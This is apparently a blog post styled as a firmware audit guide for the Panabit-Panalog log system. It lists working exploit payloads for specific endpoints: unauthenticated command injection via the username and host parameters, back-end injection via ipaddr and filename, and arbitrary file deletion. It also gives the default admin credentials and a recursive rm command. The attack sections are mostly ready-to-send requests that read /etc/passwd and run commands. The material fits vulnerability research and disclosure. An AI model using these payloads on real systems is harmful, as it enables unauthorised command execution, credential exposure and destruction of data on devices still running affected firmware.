Full Guide on Auditing Panabit-Panalog Log System Firmware

We delve into the fascinating world of firmware auditing, focusing on the Panabit-Panalog Log System.

As technology continues to advance at a rapid pace, ensuring the security and functionality of our systems is of paramount importance.

Firmware auditing plays a crucial role in this process, helping us identify potential vulnerabilities and implement necessary fixes.

In this post, we’ll guide you through a step-by-step process of auditing the Panabit-Panalog Log System firmware, highlighting the key areas to focus on and providing practical tips along the way.

Getting Started

This guide is aimed at auditing the Panabit-Panalog Log System firmware. The versions affected are <= MARS r10p1Free, with an impact range of 1.2w-1.4w.

You can check your version by accessing the /cretime.txt file. The default username and password are admin|panabit.

You can download the firmware source code from Panabit. After downloading, you’ll find the web directory at \usr\logd\www.

Let’s get started with the audit.

Front-end Arbitrary Command Execution

While auditing, if you wish to dig into front-end vulnerabilities, files requiring authentication must be removed.

Use the following command to remove all files containing authentication code:

rm -rf $(grep -ril 'chksession()' ./)

Command Execution Point 1

Here, a command execution point is identified. The ‘Username’ parameter is used to execute commands using ‘Exec’. However, there is no command echo.

Use the following parameters:

POST /account/sy_query.php

username=|cat /etc/passwd >1.txt

Command Execution Point 2

Here, another front-end command execution point is located. Three parameters are passed (either through GET or POST): Token, id, host. Meeting the following conditions will trigger command execution:

if (empty($token) || $id < 0 || $id == "") {
	outputres("no", "ERROR: INVALID_PARAM");
	exit;
}

Use the following payload:

POST /content-apply/libres_syn_delete.php

token=1&id=2&host=|cat /etc/passwd >222.txt

Back-end Arbitrary Command Execution

Execution Point 1

/ajax_ping.php

Here, the ‘ipaddr’ function is passed through POST and is used in an ‘exec’ command execution.

Use this payload:

POST /ajax_ping.php HTTP/1.1
  
ipaddr=|id >2.txt

Execution Point 2

/fetchfile.php

Here, the ‘filename’, ‘nodeip’, and ‘type’ parameters are controllable through POST, leading to ‘exec’ command execution.

Use this payload:

POST /fetchfile.php HTTP/1.1
  
type=downloadfile&filename=|id >5.txt

Back-end Arbitrary File Deletion

Here, a file deletion operation was located at /deletefile.php. The ‘filename’ parameter is passed and the ‘unlink’ function is called for file deletion.

Use this payload:

POST /deletefile.php HTTP/1.1
  
filename=5.txt

Conclusion

We’ve reached the end of our comprehensive guide on auditing the Panabit-Panalog Log System firmware.

Always ensure you’re using the latest version of your software to avoid potential vulnerabilities.

We hope that the detailed walkthrough, from identifying arbitrary command execution points to spotting file deletion operations, has been insightful.

Remember, firmware auditing is a critical aspect of maintaining system integrity and security, and it’s a skill worth mastering.

Always ensure you’re using the latest versions of your software to keep potential vulnerabilities at bay.